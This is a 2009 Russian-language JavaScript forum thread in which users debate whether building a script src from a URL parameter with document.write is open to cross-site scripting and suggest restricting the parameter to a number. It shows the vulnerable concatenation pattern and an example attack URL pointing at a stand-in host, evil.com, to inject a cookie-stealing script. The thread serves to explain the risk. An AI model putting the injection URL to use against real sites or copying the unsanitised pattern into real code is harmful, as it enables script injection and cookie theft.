Javascript.RU

Создать новую тему Ответ
 
Опции темы Искать в теме
  #11 (permalink)  
Старый 23.01.2009, 17:25
Интересующийся
Отправить личное сообщение для viliv Посмотреть профиль Найти все сообщения от viliv
 
Регистрация: 12.07.2008
Сообщений: 10

Сообщение от ZoNT Посмотреть сообщение
xss - межсайтовый скриптинг.
Почему плохо:
www.name.ru/index.htm?http://www.evil.com/script
И всё... По этой ссылке на твою страничку вставится скрипт http://www.evil.com/script.js и сделает что угодно (сворует куки, покажет порнорекламу и т.д.)
но моя страница index.htm откроет скрипт только с моего сайта... если я его пропишу - document.write('<script TYPE="text/javascript" src="www.name.ru/'+url+'.js">
Ответить с цитированием
  #12 (permalink)  
Старый 23.01.2009, 17:33
Флудер
Отправить личное сообщение для ZoNT Посмотреть профиль Найти все сообщения от ZoNT
 
Регистрация: 25.07.2008
Сообщений: 1,271

способ вставить свою ссылку всё равно есть, ты уже открыл окно для xss, так что это только вопрос времени (которого у меня сейчас нет, так как я на работе).
Ответить с цитированием
  #13 (permalink)  
Старый 23.01.2009, 17:37
Новичок на форуме
Отправить личное сообщение для Kolyaj Посмотреть профиль Найти все сообщения от Kolyaj
 
Регистрация: 19.02.2008
Сообщений: 9,177

Это на стороне сервера делаться должно. Но имя скрипта в урле передавать все равно не надо.
Ответить с цитированием
  #14 (permalink)  
Старый 23.01.2009, 17:38
Интересующийся
Отправить личное сообщение для viliv Посмотреть профиль Найти все сообщения от viliv
 
Регистрация: 12.07.2008
Сообщений: 10

Сообщение от ZoNT Посмотреть сообщение
способ вставить свою ссылку всё равно есть, ты уже открыл окно для xss, так что это только вопрос времени (которого у меня сейчас нет, так как я на работе).
у меня в подгружаемом скрипте только данные которые потом обрабатывет втой скрипт. он сразу рагаться будет о ошибку на странице. наверное.

Подгружается скрипт с этим -
Add("1","10001","17","1.000","15.000","1")
Ответить с цитированием
  #15 (permalink)  
Старый 23.01.2009, 17:41
Флудер
Отправить личное сообщение для ZoNT Посмотреть профиль Найти все сообщения от ZoNT
 
Регистрация: 25.07.2008
Сообщений: 1,271

можно подгружать свой скрипт, а из него подргужать твой и никто ругаться не будет...
Ответить с цитированием
  #16 (permalink)  
Старый 23.01.2009, 18:18
Интересующийся
Отправить личное сообщение для viliv Посмотреть профиль Найти все сообщения от viliv
 
Регистрация: 12.07.2008
Сообщений: 10

Думаю ничего не получиться...

document.write('<script TYPE="text/javascript" src="www.name.ru/'+url+'.js">
www.name.ru/index.htm?http://www.evil.com/script

и что моя страница откроет? www.name.ru/http://www.evil.com/script.js
думаю ругаться будет.
я уже попоробывал открыть другой скрипт, в котором прописал просто открыть нужный мне. и ничего не получилось встроеный в страницу скрипт сразу ругнулся...
Ответить с цитированием
  #17 (permalink)  
Старый 23.01.2009, 18:21
Флудер
Отправить личное сообщение для ZoNT Посмотреть профиль Найти все сообщения от ZoNT
 
Регистрация: 25.07.2008
Сообщений: 1,271

не бойся, если у тебя не получилось, это не значит что так нельзя...
Ответить с цитированием
  #18 (permalink)  
Старый 23.01.2009, 18:41
Интересующийся
Отправить личное сообщение для viliv Посмотреть профиль Найти все сообщения от viliv
 
Регистрация: 12.07.2008
Сообщений: 10

Сообщение от ZoNT Посмотреть сообщение
не бойся, если у тебя не получилось, это не значит что так нельзя...
да просто если ты в урле укажешь не имя скрипта, а адрес другого, то браузер выдаст - страница не найдена... он не запустит скрипт с другого сервера.
Ответить с цитированием
  #19 (permalink)  
Старый 24.01.2009, 01:45
Аватар для x-yuri
Отправить личное сообщение для x-yuri Посмотреть профиль Найти все сообщения от x-yuri
 
Регистрация: 27.12.2008
Сообщений: 4,201

viliv, тебе все правильно советуют. Это лучше делать на сервере, с помощью php или что у тебя там. Если данных в целом немного, можно их все подгрузить. Если же ты все-таки хочешь обойтись без серверного языка, то напиши лучше
document.write('<script TYPE="text/javascript" src="'+Number(url)+'.js"><\/script>')

т.е. будет происходить преобразование в число. Ослаблять это ограничение (только числа) опасно
Хотя мне тоже интересно как можно воспользоваться src="www.name.ru/'+url+'.js"
Скорее всего имелось в виду, что плохо заводить такую привычку. Однажды она тебя подведет ;-)
Ответить с цитированием
  #20 (permalink)  
Старый 24.01.2009, 03:08
Аватар для Gvozd
Матрос
Отправить личное сообщение для Gvozd Посмотреть профиль Найти все сообщения от Gvozd
 
Регистрация: 04.04.2008
Сообщений: 6,246

Сообщение от x-yuri
Хотя мне тоже интересно как можно воспользоваться src="www.name.ru/'+url+'.js"
в одной из классических статей по взлому mail.ru используется скрипт редиректа, с помощью которого там проводились шикарные вещи
если на name.ru будет неаккуратный редирект серверный где-нить, то хана.
но и помимо этого простор для творчества есть.это ж ведь немного искуство)))
Ответить с цитированием
Ответ


Опции темы Искать в теме
Искать в теме:

Расширенный поиск


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Остановить выполнение скрипта Nonam Общие вопросы Javascript 22 04.05.2009 01:45
Загрузка скрипта с локального комьютера uncher AJAX и COMET 49 04.02.2009 23:12
Исполнение PHP скрипта AJAXом KiTaeZa AJAX и COMET 1 19.12.2008 17:39
подключение стороннего js скрипта friend Общие вопросы Javascript 2 24.05.2008 19:51
Простой вопрос - надо из скрипта перейти на ссылку Brother Общие вопросы Javascript 1 27.02.2008 09:50